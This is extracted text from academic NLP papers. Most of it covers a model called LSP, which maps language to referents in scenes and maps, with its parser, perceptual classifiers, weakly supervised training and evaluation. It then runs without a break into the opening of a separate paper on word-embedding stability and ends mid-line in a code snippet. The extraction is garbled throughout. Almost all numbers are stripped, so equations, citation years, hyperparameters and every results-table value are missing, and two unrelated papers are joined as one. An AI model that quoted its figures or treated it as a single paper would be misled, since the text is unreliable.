the shown pred- icate instances, where the categories include blue, mug and table, and the relations include on-rel. the perception function scores logical knowledge bases using a set of per-predicate binary classifiers. these classifiers independently assign a score to whether each entity (entity pair) is an element of each category (relation). let γc ∈ Γ denote the set of entities which are elements of category c; simi- larly, let γr ∈ Γ denote the set of entity pairs which are elements of the relation r. 
given these sets, the score of a logical knowledge base Γ factors into per- relation and per-category scores h: fper(Γ,d; θper) = ∑ c∈c h(γc,d; θcper) + ∑ r∈r h(γr,d; θrper) the per-predicate scores are in turn given by a sum of per-element classification scores: h(γc,d; θcper) = ∑ e∈ed γc(e)(θcper) tφcat(e) h(γr,d; θrper) = ∑ (e ,e )∈ed γr(e ,e )(θ r per) tφrel(e ,e ) each term in the above sums represents a single binary classification, determining the score for a sin- gle entity (entity pair) belonging to a particular cat- egory (relation). we treat γc and γr as indicator functions for the sets they denote, i.e., γc(e) = for entities e in the set, and otherwise. similarly, γr(e ,e ) = for entity pairs (e ,e ) in the set, and otherwise. the features of these classifiers are given by φcat and φrel, which are feature functions that map entities and entity pairs to feature vectors. the parameters of these classifiers are given by θcper and θrper. the perception parameters θper contain one such set of parameters for every category and re- lation, i.e., θper = {θcper : c ∈ c}∪{θrper : r ∈ r}. . semantic parser the goal of semantic parsing is to identify which portions of the input natural language denote enti- ties and relationships between entities in the envi- ronment. semantic parsing accomplishes this goal by mapping from natural language to a logical form that explicitly describes the language’s entity refer- ents using one- and two-argument predicates. the logical form is combined with instances of these predicates to produce the statement’s denotation. lsp’s semantic parser is defined using combina- tory categorial grammar (ccg) (steedman, ). the grammar of the parser is given by a lexicon Λ which maps words to syntactic categories and logi- cal forms. for example, “mug” may have the syn- tactic category n for noun, and the logical form λx.mug(x), denoting the set of all entities x such that mug is true. during parsing, the logical forms for adjacent phrases are combined to produce the logical form for the complete statement. the n/n λf.f mugs n λx.mug(x) n : λx.mug(x) are (s\n)/n λf.λg.λx.g(x) ∧f(x) right n/pp λf.λx.∃y.right-rel(x,y) ∧f(y) of pp/n λf.f the n/n λf.f monitor n λx.monitor(x) n : λx.monitor(x) pp : λx.monitor(x) n : λx.∃y.right-rel(x,y) ∧monitor(y) s\n : λg.λx.∃y.g(x) ∧right-rel(x,y) ∧monitor(y) s : λx.∃y.mug(x) ∧right-rel(x,y) ∧monitor(y) figure : example parse of “the mugs are right of the monitor.” the first row of the derivation retrieves lexical categories from the lexicon, while the remaining rows represent applications of ccg combinators. figure illustrates how ccg parsing produces a syntactic tree t and a logical form `. the top row of the parse represents retrieving a lexicon entry for each word. each successive row combines a pair of entries by applying a logical form to an adjacent ar- gument. a given sentence may have multiple parses like the one shown, using a different set of lexicon entries or a different order of function applications. the semantic parser scores each such parse, learning to distinguish correct and incorrect parses. the semantic parser in lsp is a linear model over ccg parses (`,t) given language z: fprs(`,t,z; θprs) = θ t prsφprs(`,t,z) here, φprs(`,t,z) represents a feature function map- ping ccg parses to vectors of feature values. φprs factorizes according to the tree structure of the ccg parse; it contains features for local parsing opera- tions which are summed to produce the feature val- ues for a tree. 
if the parse tree is a terminal, then: φprs(`,t,z) = (lexicon entry) the notation (x) denotes a vector with a single one entry whose position is determined by x. the termi- nal features are indicator features for each lexicon entry, as shown in the top row of figure . these features allow the model to learn the correct syntac- tic and semantic function of each word. if the parse tree is a nonterminal, then: φprs(`,t,z) = φprs(left(`,t,z)) + φprs(right(`,t,z)) + (combinator) these nonterminal features are defined over combi- nator rules in the parse tree, as in the remaining rows of figure . these features allow the model to learn which adjacent parse trees are likely to combine. we refer the reader to zettlemoyer and collins ( ) for more information about ccg semantic parsing. . evaluation function the evaluation function feval deterministically scores denotations given a logical form ` and a logical knowledge base Γ. intuitively, the evalu- ation function simply evaluates the query ` on the database Γ to produce a denotation. the evaluation function then assigns score to this denotation, and score −∞ to all other denotations. we describe feval by giving a recurrence for com- puting the denotation γ of a logical form ` on a log- ical knowledge base Γ. this evaluation takes the form of a tree, as in figure c. the base cases are: • if ` = λx.c(x) then γ = γc. • if ` = λx.λy.r(x,y), then γ = γr. the denotations for more complex logical forms are computed recursively by decomposing ` accord- ing to its logical structure. our logical forms con- tain only conjunctions and existential quantifiers; the corresponding recursive computations are: • if ` = λx.` (x) ∧ ` (x), then γ(e) = iff γ (e) = ∧γ (e) = . • if ` = λx.∃y.` (x,y), then γ(e ) = iff ∃e .γ (e ,e ) = . note that a similar recurrence can be used to com- pute groundings: simply retain the satisfying assign- ments to existentially-quantified variables. . inference the basic inference problem in lsp is to predict a denotation γ given language z and an environment d. this inference problem is straightforward due to the deterministic structure of feval. the highest- scoring γ can be found by independently maximiz- ing fprs and fper to find the highest-scoring logical form ` and logical knowledge base Γ. deterministi- cally evaluating the recurrence for feval using these values yields the highest-scoring denotation. another inference problem occurs during train- ing: identify the highest-scoring logical form and knowledge base which produce a particular denota- tion. our approximate inference algorithm for this problem is described in section . . weakly supervised parameter estimation this section describes a weakly supervised training procedure for lsp, which estimates parameters us- ing a corpus of sentences with annotated denota- tions. the algorithm jointly trains both the pars- ing and the perception components of lsp to best predict the denotations of the observed training sen- tences. our approach trains lsp as a maximum margin markov network using the stochastic subgra- dient method. the main difficulty is computing the subgradient, which requires computing values for the model’s hidden variables, i.e., the logical knowl- edge base Γ and semantic parse ` that are responsi- ble for the model’s prediction. . stochastic subgradient method the training procedure trains lsp as a maximum margin markov network (taskar et al., ), a structured analog of a support vector machine. 
the training data for our weakly supervised algorithm is a collection {(zi,γi,di)}ni= , consisting of language zi paired with its denotation γi in environment di. given this data, the parameters θ = [θprs,θper] are estimated by minimizing the following objective function: o(θ) = λ ||θ|| + n [ n∑ i= ζi ] ( ) where λ is a regularization parameter that controls the trade-off between model complexity and slack penalties. the slack variable ζi represents a margin violation penalty for the ith training example, de- fined as: ζi = max γ,Γ,`,t [ f(γ, Γ,`,t,zi,di; θ) + cost(γ,γi) ] − max Γ,`,t f(γi, Γ,`,t,zi,di; θ) the above expression is the structured counterpart of the hinge loss, where cost(γ,γi) is the margin by which γi’s score must exceed γ’s score. we let cost(γ,γi) be the hamming cost; it adds a cost of for each entity e such that γi(e) = γ(e). we optimize this objective using the stochastic subgradient method (ratliff et al., ). to com- pute the subgradient gi, first compute the highest- scoring assignments to the model’s hidden variables: γ̂, Γ̂, ˆ̀, t̂ ←arg max γ,Γ,`,t f(γ, Γ,`,t,zi,di; θj) + cost(γ,γi) ( ) Γ∗,`∗, t∗ ←arg max Γ,`,t f(γi, Γ,`,t,zi,di; θj) ( ) the first set of values (e.g., ˆ̀) are the best ex- planation for the denotation γ̂ which most violates the margin constraint. the second set of values (e.g., `∗) are the best explanation for the true de- notation γi. the subgradient update increases the weights of features that explain the true denotation, while decreasing the weights of features that explain the denotation violating the margin. the subgradi- ent factors into parsing and perception components: gi = [giprs,g i per]. the parsing subgradient is: giprs = φprs( ˆ̀, t̂,zi) − φprs(`∗, t∗,zi) the subgradient of the perception parameters θper factors into subgradients of the category and relation classifier parameters. recall that θper = {θcper : c ∈ c}∪{θrper : r ∈ r}. let γ̂c ∈ Γ̂ be the best margin- violating set of entities for c, and γc∗ ∈ Γ∗ be the best truth-explaining set of entities. similarly define γ̂r and γr∗. the subgradients of the category and relation classifier parameters are: gi,cper = ∑ e∈e di (γ̂c(e) −γc∗(e)) φcat(e) gi,rper = ∑ (e ,e )∈edi (γ̂r(e ,e ) −γr∗(e ,e )) φrel(e ,e ) . inference: computing the subgradient solving the maximizations in equations and is challenging because the weights placed on the de- notation γ couple fprs and fper. due to this cou- pling, exactly solving these problems requires ( ) enumerating all possible logical forms `, and ( ) for each logical form, finding the highest-scoring logi- cal knowledge base Γ by propagating the weights on γ back through feval. we use a two-step approximate inference algo- rithm for both maximizations. the first step per- forms a beam search over ccg parses, producing k possible logical forms ` , ...,`k. the second step uses an integer linear program (ilp) to find the best logical knowledge base Γ given each parse `i. in our experiments, we parse with a beam size of , then solve an ilp for each of the highest-scoring logical forms. the highest-scoring parse/logical knowledge base pair is the approximate maximizer. given a logical form ` output by beam search, the second step of inference computes the best values for the logical knowledge base Γ and denotation γ: max Γ,γ fper(Γ,d; θper) + feval(γ,`, Γ) + ψ(γ) ( ) here, ψ(γ) = ∑ e∈ed ψeγ(e) represents a set of weights on the entities in the predicted denotation γ. for equation , ψ represents cost(γ,γi). 
for equa- tion , ψ is a hard constraint encoding γ = γi (i.e., ψ(γ) = −∞ when γ = γi and otherwise). we encode the maximization in equation as an ilp. for each category c and relation r, we create bi- nary variables γc(e ) and γr(e ,e ) for each entity in the environment, e ,e ∈ ed. we similarly create binary variables γ(e) for the denotation γ. using the fact that fper is a linear function of these variables, we write the ilp objective as: fper(Γ,d; θper) + ψ(γ) = ∑ e ∈ed ∑ c∈c wce γ c(e ) + ∑ e ,e ∈ed ∑ r∈r wre ,e γ r(e ,e ) + ∑ e ∈ed ψe γ(e ) where the weights wce and w r e ,e determine how likely it is that each entity or entity pair belongs to the predicates c and r: wce = (θ c per) tφcat(e ) wre ,e = (θ r per) tφrel(e ,e ) the ilp also includes constraints and additional auxiliary variables that represent feval. these con- straints couple the denotation γ and the logical knowledge base Γ such that γ is the result of evaluat- ing ` on Γ. ` is recursively decomposed as in section . , and each intermediate set of entities in the recur- rence is given its own set of |ed| (or |ed| ) variables. these variables are then logically constrained to en- force `’s structure. evaluation our evaluation performs three major comparisons. first, we examine the performance impact of weakly supervised training by comparing weakly and fully supervised variants of lsp. second, we examine the performance impact of modelling relations by com- paring against a category-only baseline, which is an ablated version of lsp similar to the model of ma- tuszek et al. ( ). finally, we examine the causes of errors by performing an error analysis of lsp’s semantic parser and perceptual classifiers. before describing our results, we first describe some necessary set-up for the experiments. these sections describe the data sets, features, construc- tion of the ccg lexicon, and details of the models. our data sets and additional evaluation resources are available online from http://rtw.ml.cmu.edu/ tacl _lsp/. . data sets we evaluate lsp on two applications: scene un- derstanding (scene) and geographical question an- swering (geoqa). these data sets are collections {(zi,γi,di,`i, Γi)}ni= , consisting of a number of natural language statements zi with annotated deno- tations γi in environments di. for fully supervised training, each statement is annotated with a gold standard logical form `i, and each environment with a gold standard logical knowledge base Γi. statistics of these data sets are shown in table , and example environments and statements are shown in figure . the scene data set consists of segmented images of indoor environments containing a number of or- dinary objects such as mugs and monitors. each image is an environment, and each image segment (bounding box) is an entity. we collected natural language descriptions of each scene from members of our lab and amazon mechanical turk, asking subjects to describe the objects in each scene. the authors then manually annotated the collected state- ments with their denotations and logical forms. in this data set, each image contains the same set of ob- jects; note that this does not trivialize the task, as the model only observes visual features of the objects, which are not consistent across environments. the geoqa data set consists of several maps containing entities such as cities, states, national parks, lakes and oceans. 
each map is an envi- ronment, and its component entities are given by polygons of latitude/longitude coordinates marking data set statistics scene geoqa # of environments mean entities / environment d . . mean # of entities in denotation γ . . # of statements mean words / statement . . mean predicates / log. form . . # of preds. in annotated worlds lexicon statistics # of words in lexicon # of lexicon entries mean parses / statement . . table : statistics of the two data sets used in our evaluation, and of the generated lexicons. their boundaries. furthermore, each entity has one known name (e.g., “greenville”). in this data set, distinct entities occur on average in . environ- ments; repeated entities are mostly large locations, such as states and oceans. the language for this data set was contributed by members of our research group, who were instructed to provide a mixture of simple and complex geographical questions. the authors then manually annotated each question with a denotation (its answer) and a logical form. . features the features of both applications are intended to capture properties of entities and relations between them. as such, both applications share a set of phys- ical features which are functions of the bounding polygons of each entity. example category features (φcat) are the area and perimeter of the entity, and an example relation feature (φrel) is the distance be- tween entity centroids. the scene data set additionally includes visual appearance features in φcat to capture visual proper- ties of objects. these features include a histogram of oriented gradients (hog) (dalal and triggs, ) and an rgb color histogram. the geoqa data set additionally includes dis- tributional semantic features to distinguish between different types of entities (e.g., states vs. lakes) and to capture non-spatial relations (e.g., capitals of states). these features are derived from phrase co-occurrences with entity names in the clueweb polygons were extracted from openstreetmap, http:// www.openstreetmap.org/. web corpus. the category features φcat include in- dicators for the contexts which most frequently occur with an entity’s name (e.g., “x is a city”). similarly, the relation features φrel include indica- tors for the most frequent contexts between two entities’ names (e.g., “x in eastern y ”). . lexicon induction one of the inputs to the semantic parser (section . ) is a lexicon that lists possible syntactic and seman- tic functions for each word. together, these per- word entries define the set of possible logical forms for every statement. each word may have mul- tiple lexicon entries to capture uncertainty about its meaning. for example, the word “right” may have entries n : λx.right(x) and n/pp : λf.λx.∃y.right-rel(x,y) ∧f(y). the semantic parser learns to distinguish among these interpreta- tions to produce good logical forms. we automatically generated lexicons for both applications using part-of-speech tag heuristics. these heuristics map words to lexicon entries con- taining category and relation predicates derived from the word’s lemma. nouns and adjectives pro- duce lexicon entries containing either categories or relations (as shown above for “right”). mapping these parts-of-speech to relations is necessary for phrases like “to the right of,” where the noun “right” denotes a relation. verbs and prepositions pro- duce lexicon entries containing relations. 
additional heuristics generate semantically-empty lexicon en- tries, allowing words like determiners to have no physical interpretation. finally, there are special heuristics for forms of “to be” and, in geoqa, to handle known entity names. the complete set of lexicon induction heuristics is available online. the automatically generated lexicon makes it dif- ficult to compare semantic parses across models, since the correctness of a semantic parse depends on the learned perceptual classifiers. to facilitate such a comparison (section . ), we filtered out lexicon entries containing predicates which were not used in any of the annotated logical forms. statistics of the filtered lexicons are shown in table . http://www.lemurproject.org/clueweb / we used the stanford pos tagger (toutanova et al., ). environment d language z and predicted logical form ` predicted grounding true grounding monitor to the left of the mugs {( , ), ( , )} {( , ), ( , )} λx.∃y.monitor(x) ∧ left-rel(x,y) ∧ mug(y) mug to the left of the other mug {( , )} {( , )} λx.∃y.mug(x) ∧ left-rel(x,y) ∧ mug(y) objects on the table {( , ), ( , ) {( , ), ( , ), λx.∃y.object(x) ∧ on-rel(x,y) ∧ table(y) ( , )} ( , )} two blue cups are placed near to the computer screen {( )} {( , ), ( , )} λx.blue(x) ∧ cup(x) ∧ comp.(x) ∧ screen(x) what cities are in north carolina? {(ch,nc), (gb,nc) {(ch,nc), (gb,nc) λx.∃y.city(x) ∧ in-rel(x,y) ∧ y = nc (ra,nc)} (ra,nc)} what city is east of greensboro in north carolina? {(ra,gb,nc), {(ra,gb,nc)} λx.∃y,z.city(x) ∧ east-rel(x,y) (mb,gb,nc)} ∧ y = gb ∧ in-rel(y,z) ∧ z = nc what cities are on the ocean? {(ch,ao), (gb,ao), {(mb,ao)} λx.∃y.city(x) ∧ on-rel(x,y) ∧ ocean(y) (mb,ao), (ra,ao)} figure : example environments, statements, and model predictions from the scene and geoqa data sets. . models and training the evaluation compares three models. the first model is lsp-w, which is lsp trained using the weakly supervised algorithm described in section . the second model, lsp-cat, replicates the model of matuszek et al. ( ) by restricting lsp to use category predicates. lsp-cat is constructed by removing all relation predicates in lexicon entries, mapping entries like λf.λg.λx.∃y.r(x,y) ∧ g(x) ∧ f(y) to λf.λg.λx.∃y.g(x) ∧ f(y). this model is also trained using our weakly supervised algorithm. the third model, lsp-f, is lsp trained with full supervision, using the manually annotated semantic parses and logical knowledge bases in our data sets. given these annotations, training lsp amounts to independently training a semantic parser (using sen- tences with annotated logical forms, {(zi,`i)}) and a set of perceptual classifiers (using environments with annotated logical knowledge bases, {(di, Γi)}). this model measures the performance achievable with lsp given significantly more supervision. all three variants of lsp were trained using the same hyperparameters. for scene, we computed subgradients in example minibatches and per- formed passes over the data using λ = . . for geoqa, we computed subgradients in example minibatches, again performing passes over the data using λ = . . we tried varying the regular- ization parameter, but found that performance was relatively stable under λ ≤ . . all experiments use leave-one-environment-out cross-validation to estimate model performance. we hold out each en- vironment in turn, train each model on the remaining environments, then test on the held-out environment. . results we consider two prediction problems in the eval- uation. 
the first problem is to predict the correct denotation γi for a statement zi in an environment di. a correct prediction on this task corresponds to a correctly answered question. a weakness of this task is that it is possible to guess the right de- notation without fully understanding the language. for example, given a query like “mugs on the ta- ble,” it might be possible to guess the denotation based solely on “mugs,” ignoring “table” altogether. the grounding prediction task corrects for this prob- lem. here, each model predicts a grounding, which is the set of all satisfying assignments to the vari- ables in a logical form. for example, for the log- ical form λx.∃y.left-rel(x,y) ∧ mug(y), the grounding is the set of (x,y) tuples for which both left-rel(x,y) and mug(y) return true. note that, if the predicted semantic parse is incorrect, the predicted grounding for a statement may contain a different number of variables than the true ground- ing; such groundings are incorrect. figure shows model predictions for the grounding task. performance on both tasks is measured using ex- act match accuracy. this metric is the fraction of examples for which the predicted set of entities (be it the denotation or grounding) exactly equals the annotated set. this is a challenging metric, as the denotation γ rel. rel. other total lsp-cat . . . . lsp-f . . . . lsp-w . . . . grounding g rel. rel. other total lsp-cat . . . . lsp-f . . . . lsp-w . . . . % of data (a) results on the scene data set. denotation γ rel. rel. other total lsp-cat . . . . lsp-f . . . . lsp-w . . . . grounding g rel. rel. other total lsp-cat . . . . lsp-f . . . . lsp-w . . . . % of data (b) results on the geoqa data set. table : model performance on the scene and geoqa datasets. lsp-cat is an ablated version of lsp that only learns categories (similar to matuszek et al. ( )), lsp-f is lsp trained with annotated seman- tic parses and logical knowledge bases, and lsp-w is lsp trained on sentences with annotated denotations. results are separated by the number of relations in each test natural language statement. number of possible sets grows exponentially in the number of entities in the environment. say an en- vironment has entities and a logical form has two variables; then there are possible denotations and possible groundings. to quantify this difficulty, note that selecting a denotation uniformly at random achieves % accuracy on scene, and % accuracy on geoqa; selecting a random grounding achieves % and % accuracy, respectively. table shows results for both applications us- ing exact match accuracy. to better understand the performance of each model, we break down perfor- mance according to linguistic complexity. we com- pute the number of relations in the annotated logical form for each statement, and show separate results for and relations. we also include an “other” category to capture sentences with more than one relation (very infrequent), or that include quanti- fiers, comparatives, or other linguistic phenomena not captured by lsp. the results from these experiments suggest three conclusions. first, we find that modelling relations is important for both applications, as ( ) the major- ity of examples contain relational language, and ( ) lsp-w and lsp-f dramatically outperform lsp- cat on these examples. the low performance of lsp-cat suggests that many denotations cannot be predicted from only the first noun phrase in a statement, demonstrating that both applications re- quire an understanding of relations. 
second, we find that weakly supervised training and fully supervised training perform similarly, with accuracy differences in the range of %- %. finally, we find that lsp-w performs similarly on both the denotation and com- plete grounding tasks; this result suggests that when lsp-w predicts a correct denotation, it does so be- cause it has identified the correct entity referents of each portion of the statement. . component error analysis we performed an error analysis of each model com- ponent to better understand the causes of errors. ta- ble shows the accuracy of the semantic parser from each trained model. each held-out sentence zi is parsed to produce a logical form `, which is marked correct if it exactly matches our manual annotation `i. a correct logical form implies a correct ground- ing for the statement when the parse is evaluated in the gold standard logical knowledge base. these re- sults show that both lsp-w and lsp-f have rea- sonably accurate semantic parsers, given the restric- tions on possible logical forms. common mistakes include missing lexicon entries (e.g., “borders” is pos-tagged as a noun, so the geoqa lexicon does not include a verb for it) and prepositional phrase attachments (e.g., th example in figure ). table shows the precision and recall of the in- dividual perceptual classifiers. we computed these metrics by comparing each annotated predicate in the held-out environment with the model’s predic- tions for the same predicate, treating each entity (or entity pair) as an independent example for classifi- scene geoqa lsp-cat . . lsp-w . . lsp-f . . upper bound . . table : accuracy of the semantic parser from each trained model. upper bound is the highest accu- racy achievable without modelling comparatives and other linguistic phenomena not captured by lsp. cation. fully supervised training appears to produce better perceptual classifiers than weakly supervised training; however, this result conflicts with the full system evaluation in table , where both systems perform equally well. there are two causes for this phenomenon: uninformative adjectives and unim- portant relation instances. uninformative adjective predicates are responsi- ble for the low performance of the category classi- fiers in scene. phrases like “lcd screen” in this domain are annotated with logical forms such as λx.lcd(x) ∧ screen(x). here, lcd is uninfor- mative, since screen already denotes a unique ob- ject in the environment. therefore, it is not impor- tant to learn an accurate classifier for lcd. weakly supervised training learns that lcd is meaningless, yet predicts the correct denotation for λx.lcd(x) ∧ screen(x) using its screen classifier. the discrepancy in relation performance occurs because the relation evaluation weights every rela- tion equally, whereas in reality some relations are more frequent. furthermore, even within a single relation, each entity pair is not equally important – for example, people tend to ask what is in a state, but not what is in an ocean. to account for these factors, we define a reweighted relation metric using the an- notated logical forms containing only one relation, of the form λx.∃y.c (x) ∧ r(x,y) ∧ c (y). using these logical forms, we measure the performance of r on the set of x,y pairs such that c (x)∧c (y), then average this over all examples. table shows that, using this metric, both training regimes have similar performance. 
this result suggests that weakly su- pervised training adapts lsp’s relation classifiers to the relation instances which are empirically impor- tant for grounding natural language. scene geoqa categories p r f p r f lsp-cat . . . . . . lsp-w . . . . . . lsp-f . . . . . . relations p r f p r f lsp-w . . . . . . lsp-f . . . . . . relations (rw) p r f p r f lsp-w . . . . . . lsp-f . . . . . . table : perceptual classifier performance, mea- sured against the gold standard logical knowledge bases. lsp-cat is excluded from the relation eval- uations, since it does not learn relations. relations (rw) is the reweighted metric (see text for details). conclusions this paper introduces logical semantics with per- ception (lsp), a model for mapping natural lan- guage statements to their referents in a physical en- vironment. lsp jointly models perception and lan- guage understanding, simultaneously learning ( ) to map from environments to logical knowledge bases containing instances of both one-argument categories and two-argument relations, and ( ) to semantically parse natural language. furthermore, we introduce a weakly supervised training proce- dure that trains lsp using only sentences with anno- tated denotations, without annotated semantic parses or noun phrase/entity mappings. an experimen- tal evaluation reveals that this procedure performs nearly as well fully supervised training, while re- quiring significantly less annotation effort. our ex- periments also find that lsp’s ability to learn rela- tions improves performance over comparable prior work (matuszek et al., ). acknowledgments this research has been supported in part by darpa under award fa - - - , and in part by a gift from google. we also gratefully acknowledge the cmu read the web group for assistance with data set construction, and tom mitchell, manuela veloso, brendan o’connor, felix duvallet, robert fisher and the anonymous reviewers for helpful dis- cussions and comments on the paper. references rehj cantrell, matthias scheutz, paul schermerhorn, and xuan wu. . robust spoken instruc- tion understanding for hri. in proceedings of the th acm/ieee international conference on human- robot interaction. david l. chen and raymond j. mooney. . learning to sportscast: a test of grounded language acquisition. in proceedings of the th international conference on machine learning. david l. chen and raymond j. mooney. . learn- ing to interpret natural language navigation instruc- tions from observations. in proceedings of the th aaai conference on artificial intelligence. james clarke, dan goldwasser, ming-wei chang, and dan roth. . driving semantic parsing from the world’s response. in proceedings of the four- teenth conference on computational natural lan- guage learning. navneet dalal and bill triggs. . histograms of oriented gradients for human detection. in proceed- ings of the ieee computer society conference on computer vision and pattern recognition. juraj dzifcak, matthias scheutz, chitta baral, and paul schermerhorn. . what to do and how to do it: translating natural language directives into tempo- ral and dynamic logic representation for goal manage- ment and action execution. in proceedings of the ieee international conference on robotics and au- tomation. kai-yuh hsiao, nikolaos mavridis, and deb roy. . coupling perception and simulation: steps towards conversational robotics. in proceedings of the ieee/rsj international conference on intelligent robots and systems. rohit j. kate and raymond j. mooney. . 
using string-kernels for learning semantic parsers. in pro- ceedings of the st international conference on com- putational linguistics and the th annual meeting of the acl. rohit j. kate and raymond j. mooney. . learning language semantics from ambiguous supervision. in proceedings of the nd conference on artificial in- telligence. thomas kollar, stefanie tellex, deb roy, and nicholas roy. . toward understanding natural language directions. in proceedings of the th acm/ieee in- ternational conference on human-robot interaction. jayant krishnamurthy and tom m. mitchell. . weakly supervised training of semantic parsers. in proceedings of the joint conference on empir- ical methods in natural language processing and computational natural language learning. geert-jan m. kruijff, hendrik zender, patric jensfelt, and henrik i. christensen. . situated dialogue and spatial organization: what, where... and why. in- ternational journal of advanced robotic systems. tom kwiatkowski, luke zettlemoyer, sharon goldwa- ter, and mark steedman. . inducing probabilistic ccg grammars from logical form with higher-order unification. in proceedings of the conference on empirical methods in natural language processing. michael levit and deb roy. . interpretation of spa- tial language in a map navigation task. ieee transac- tions on systems, man, and cybernetics, part b. percy liang, michael i. jordan, and dan klein. . learning dependency-based compositional semantics. in proceedings of the association for computational linguistics. matthew macmahon, brian stankiewicz, and benjamin kuipers. . walk the talk: connecting language, knowledge, and action in route instructions. in pro- ceedings of the st national conference on artificial intelligence. cynthia matuszek, dieter fox, and karl koscher. . following directions using statistical machine transla- tion. in proceedings of the th acm/ieee interna- tional conference on human-robot interaction. cynthia matuszek, nicholas fitzgerald, luke zettle- moyer, liefeng bo, and dieter fox. . a joint model of language and perception for grounded at- tribute learning. in proceedings of the th interna- tional conference on machine learning. nathan d. ratliff, j. andrew bagnell, and martin a. zinkevich. . (online) subgradient methods for structured prediction. artificial intelligence and statistics. deb roy, kai-yuh hsiao, and nikolaos mavridis. . conversational robots: building blocks for grounding word meaning. in proceedings of the hlt-naacl workshop on learning word meaning from non- linguistic data. nobuyuki shimizu and andrew haas. . learning to follow navigational route instructions. in proceedings of the st international joint conference on artifical intelligence. marjorie skubic, dennis perzanowski, sam blisard, alan schultz, william adams, magda bugajska, and derek brock. . spatial language for human-robot di- alogs. ieee transactions on systems, man, and cy- bernetics, part c: applications and reviews. mark steedman. . surface structure and interpre- tation. ben taskar, carlos guestrin, and daphne koller. . max-margin markov networks. in advances in neural information processing systems. stefanie tellex, thomas kollar, steven dickerson, matthew walter, ashis banerjee, seth teller, and nicholas roy. . understanding natural language commands for robotic navigation and mobile manipu- lation. in aaai conference on artificial intelligence. kristina toutanova, dan klein, christopher d. manning, and yoram singer. . 
feature-rich part-of-speech tagging with a cyclic dependency network. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics on human language technology. terry winograd. . procedures as a representation for data in a computer program for understanding nat- ural language. ph.d. thesis, massachusetts institute of technology. yuk wah wong and raymond j. mooney. . learn- ing for semantic parsing with statistical machine trans- lation. in proceedings of the main conference on hu- man language technology conference of naacl. john m. zelle and raymond j. mooney. . learn- ing to parse database queries using inductive logic pro- gramming. in proceedings of the thirteenth national conference on artificial intelligence. luke s. zettlemoyer and michael collins. . learn- ing to map sentences to logical form: structured clas- sification with probabilistic categorial grammars. in proceedings of the st conference in uncertainty in artificial intelligence. evaluating the stability of embedding-based word similarities maria antoniak cornell university maa @cornell.edu david mimno cornell university mimno@cornell.edu abstract word embeddings are increasingly being used as a tool to study word associations in specific corpora. however, it is unclear whether such embeddings reflect enduring properties of lan- guage or if they are sensitive to inconsequential variations in the source documents. we find that nearest-neighbor distances are highly sen- sitive to small changes in the training corpus for a variety of algorithms. for all methods, including specific documents in the training set can result in substantial variations. we show that these effects are more prominent for smaller training corpora. we recommend that users never rely on single embedding models for distance calculations, but rather average over multiple bootstrap samples, especially for small corpora. introduction word embeddings are a popular technique in natural language processing (nlp) in which the words in a vocabulary are mapped to low-dimensional vectors. embedding models are easily trained—several imple- mentations are publicly available—and relationships between the embedding vectors, often measured via cosine similarity, can be used to reveal latent seman- tic relationships between pairs of words. word em- beddings are increasingly being used by researchers in unexpected ways and have become popular in fields such as digital humanities and computational social science (hamilton et al., ; heuser, ; phillips et al., ). embedding-based analyses of semantic similarity can be a robust and valuable tool, but we find that standard methods dramatically under-represent the variability of these measurements. embedding algo- rithms are much more sensitive than they appear to factors such as the presence of specific documents, the size of the documents, the size of the corpus, and even seeds for random number generators. if users do not account for this variability, their conclusions are likely to be invalid. fortunately, we also find that simply averaging over multiple bootstrap samples is sufficient to produce stable, reliable results in all cases tested. nlp research in word embeddings has so far fo- cused on a downstream-centered use case, where the end goal is not the embeddings themselves but performance on a more complicated task. for exam- ple, word embeddings are often used as the bottom layer in neural network architectures for nlp (ben- gio et al., ; goldberg, ). 
the embeddings’ training corpus, which is selected to be as large as possible, is only of interest insofar as it generalizes to the downstream training corpus. in contrast, other researchers take a corpus- centered approach and use relationships between em- beddings as direct evidence about the language and culture of the authors of a training corpus (bolukbasi et al., ; hamilton et al., ; heuser, ). embeddings are used as if they were simulations of a survey asking subjects to free-associate words from query terms. unlike the downstream-centered approach, the corpus-centered approach is based on direct human analysis of nearest neighbors to embed- ding vectors, and the training corpus is not simply an off-the-shelf convenience but rather the central object of study. transactions of the association for computational linguistics, vol. , pp. – , . action editor: ivan titov. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downstream-centered corpus-centered big corpus small corpus, difficult or impossi- ble to expand source is not important source is the object of study only vectors are important specific, fine-grained comparisons are important embeddings are used in downstream tasks embeddings are used to learn about the mental model of word associa- tion for the authors of the corpus table : comparison of downstream-centered and corpus- centered approaches to word embeddings. while word embeddings may appear to measure properties of language, they in fact only measure properties of a curated corpus, which could suf- fer from several problems. the training corpus is merely a sample of the authors’ language model (shazeer et al., ). sources could be missing or over-represented, typos and other lexical variations could be present, and, as noted by goodfellow et al. ( ), “many datasets are most naturally arranged in a way where successive examples are highly cor- related.” furthermore, embeddings can vary consid- erably across random initializations, making lists of “most similar words” unstable. we hypothesize that training on small and poten- tially idiosyncratic corpora can exacerbate these prob- lems and lead to highly variable estimates of word similarity. such small corpora are common in digital humanities and computational social science, and it is often impossible to mitigate these problems simply by expanding the corpus. for example, we cannot create more th century english books or change their topical focus. we explore causes of this variability, which range from the fundamental stochastic nature of certain al- gorithms to more troubling sensitivities to properties of the corpus, such as the presence or absence of specific documents. we focus on the training cor- pus as a source of variation, viewing it as a fragile artifact curated by often arbitrary decisions. we ex- amine four different algorithms and six datasets, and we manipulate the corpus by shuffling the order of the documents and taking bootstrap samples of the documents. finally, we examine the effects of these manipulations on the cosine similarities between em- beddings. we find that there is considerable variability in embeddings that may not be obvious to users of these methods. rankings of most similar words are not reliable, and both ordering and membership in such lists are liable to change significantly. 
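as a concrete illustration of the nearest-neighbor lists at issue here, the short sketch below computes the top-n most similar words to a query under cosine similarity for two embedding matrices and reports the overlap of the two lists. it is an illustrative sketch only, assuming the embeddings are given as numpy arrays aligned with a shared vocabulary list; it is not code from the paper.

```python
import numpy as np

def top_n_neighbors(emb, vocab, query, n=10):
    """return the n words with highest cosine similarity to `query`.
    emb: (len(vocab), dim) array of word vectors; vocab: list of words."""
    idx = vocab.index(query)
    normed = emb / np.linalg.norm(emb, axis=1, keepdims=True)
    sims = normed @ normed[idx]
    sims[idx] = -np.inf                      # exclude the query itself
    best = np.argsort(-sims)[:n]
    return [vocab[i] for i in best]

def jaccard(list_a, list_b):
    a, b = set(list_a), set(list_b)
    return len(a & b) / len(a | b)

# two models trained on slightly different corpora may disagree noticeably:
# overlap = jaccard(top_n_neighbors(emb_run1, vocab, "marijuana"),
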